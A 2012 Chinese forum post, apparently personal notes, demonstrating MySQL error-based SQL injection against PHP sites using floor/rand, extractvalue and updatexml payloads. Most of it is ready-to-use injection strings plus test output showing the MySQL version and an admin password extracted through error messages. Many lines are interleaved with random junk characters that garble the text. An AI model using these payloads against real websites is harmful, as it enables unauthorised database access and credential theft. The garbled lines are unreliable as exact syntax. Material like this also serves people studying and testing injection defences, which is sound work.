放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
# q1 a s* q5 c% H7 s, e1 J. H0 ~, T实际测试环境:
! W. p9 J6 X, x# {$ @8 X( Y% v) Q5 w9 _7 m4 l
$ i; e% d9 N6 D+ x# `8 a9 m9 }
mysql> show tables;
3 x$ G* k! I- G( C1 Z4 u+ o, O+----------------+
' f" f3 q( R2 |5 [0 c2 F| Tables_in_test |
2 E N$ ^# u( ~4 z. [4 E# K+----------------+
) ^+ L! I' S/ Y, S' x# n6 Q$ @| admin |
! Z8 h+ d, ^# {, v1 @| article |* {2 J& v# i, s: ~% W7 ?
+----------------+
3 Z. u% k+ |( l+ H * ^' ~% k5 V8 x
- j0 H# b8 }, u% W9 D
5 g8 N0 ^. r4 k( `( }3 f8 e
mysql> describe admin;
4 X% F3 L. x7 N- S+-------+------------------+------+-----+---------+----------------+# r' k) d8 ?, s
| Field | Type | Null | Key | Default | Extra |
3 e2 @/ H3 U0 L* H; p4 C, V" t- q+-------+------------------+------+-----+---------+----------------+4 ^8 _* x1 Z( t5 X) s
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |) M9 s& {: j, f* C0 Q0 g- l
| user | varchar(50) | NO | | NULL | |5 M) }2 l$ ]1 g
| pass | varchar(50) | NO | | NULL | |
5 U/ N5 [" w3 ]) D+ i+-------+------------------+------+-----+---------+----------------+
% _/ s5 g3 \: D, i) U7 z
, s5 r9 A, r) p8 V5 A; R5 @
. V& q0 E& H( E6 _. P; ^3 v / s8 r' C! O3 d; x. g' ?
mysql> describe article;
; L! j2 r _, \ P5 B+---------+------------------+------+-----+---------+----------------+6 N$ F/ T" x# B' X4 U! X
| Field | Type | Null | Key | Default | Extra |2 [9 m9 N, u$ @# L! }; l# [
+---------+------------------+------+-----+---------+----------------+
3 W. `! ^' }9 B4 h9 H| id | int(10) unsigned | NO | PRI | NULL | auto_increment |1 i# T- W+ k% k4 ^
| title | varchar(50) | NO | | NULL | |. K- ^, B" x9 K- D! U
| content | varchar(50) | NO | | NULL | |
! A/ J, w1 t% r; ^! d% S! O9 Z+---------+------------------+------+-----+---------+----------------+
, l$ ]6 x3 g& |& s+ K! j1、通过floor报错& N# ^! d$ \( U7 B- D4 e. j3 g
可以通过如下一些利用代码
, H4 q! `. R b) ]
1 s% f& y2 }& D% p% k / i& w. W! K/ N8 I& _ y+ B
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
0 `* ?8 P h6 E E3 @4 ~from information_schema.tables group by x)a);. B0 M3 l5 U* e, a- e* k3 z0 C, n6 k
/ m: Y( f3 l( e1 ^6 R
: j" K$ l$ i& S/ }and (select count(*) from (select 1 union select null union select !1)x
) P0 a6 ^4 P9 p3 E9 `8 H ]; Ggroup by concat((select table_name from information_schema.tables limit 1),
( y- T3 ]# e* B, Lfloor(rand(0)*2)));! x3 W, \, S2 m' l4 r% t) @3 X
举例如下:9 g' S$ G+ U7 F% e( Q( H3 ^
首先进行正常查询:
- A( f8 l8 O) ^/ @3 I
1 l3 w7 Q9 i7 y4 vmysql> select * from article where id = 1;- q( F2 K; u$ `) c5 y
+----+-------+---------+
3 {: ^5 j! E' V4 a& ? p| id | title | content |
, B: [1 T' t& |+----+-------+---------+
1 V7 u* b% K7 @1 i: B( u' K| 1 | test | do it |
|, `) x- ^1 j. c, w+----+-------+---------+
1 [# z4 Y7 e6 A* k9 u6 D) D6 L假如id输入存在注入的话,可以通过如下语句进行报错。
4 r! S+ H% S: u' V; [ ! V" ?' i/ H2 o6 m1 K
1 J# H" }6 {" w% J' y# mmysql> select * from article where id = 1 and (select 1 from1 n& _: c9 X& X2 e! t% K# O
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); ^) P9 c9 o# f1 Y ~ q$ A
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
, p/ U, @* Q5 X可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
, T6 \8 o0 X, p8 P7 z( J8 H例如我们需要查询管理员用户名和密码:
( @7 }. H# w& XMethod1:$ N- T8 ^, ^$ ^7 {: ^ r4 x! }
8 a) \8 `& W& X. n8 x8 G9 E+ @! S
; o9 l& @/ e& c% v" z" c0 c, nmysql> select * from article where id = 1 and (select 1 from' x, H7 X; H' m* Z
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
4 n3 `2 ]; o4 ?2 mfrom information_schema.tables group by x)a);8 Y L. x1 P A
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'" k2 G7 R4 Z" [* w9 E: ~
Method2:2 r8 X2 z- {- A7 a( C
$ e5 ]5 h1 z$ f4 d0 f9 L9 Q* j
" v" j& e$ c* _. B/ ]& ~" B' l- hmysql> select * from article where id = 1 and (select count(*)9 b4 j. {" |5 g
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
* l# g2 E0 K& p: t+ e4 g- p9 Z" Cfloor(rand(0)*2)));
( B& H7 ?- v1 v! }$ M# Z4 ^. E( hERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
+ u3 [# O2 }, e2、ExtractValue
( }6 Z( [% g, E: U, p测试语句如下/ G0 [9 f& A3 v: a
( I5 h& T/ a8 R" r: A9 f
3 v9 P! u5 r( @" f: [. fand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));$ R% }7 g8 q; p9 t7 X3 @0 }# m
实际测试过程
/ a+ A$ B1 Q! p/ A
7 R; ~! E* c: X( p) v , T0 W5 ~4 C e' ]7 F* i
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
9 H1 J& z+ X) s. g8 R(select pass from admin limit 1)));--
5 _, d4 }3 x5 `; L1 Y- N3 ]ERROR 1105 (HY000): XPATH syntax error: '\admin888'( Z3 B! k- ^4 i! i& W4 F
3、UpdateXml1 G" q* R, V6 u
测试语句 w% J% M: ^4 y% d, E
$ R2 W% V. |4 u; I* K a
3 [6 f) I$ Z# Z# ]& \
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
~/ X$ E" m( {. K实际测试过程
! ]; |; z& ]+ H7 `$ ] ' S0 z( k" }/ s) N( Y
' v. J* s" y) B5 D- kmysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
+ n" P& z* p4 y* H3 O(select pass from admin limit 1),0x5e24),1));
2 ]% w, n( F- Q$ b* lERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
0 I5 C7 G8 [. E- f/ y+ h% |All, thanks foreign guys.
/ Z G" E. j8 T, P8 _4 x3 k
, }; I- j; E# x, E' |1 f+ @# u L" a. z8 f) b
|
发表于 2012-12-10 10:28:51
收藏
支持
反对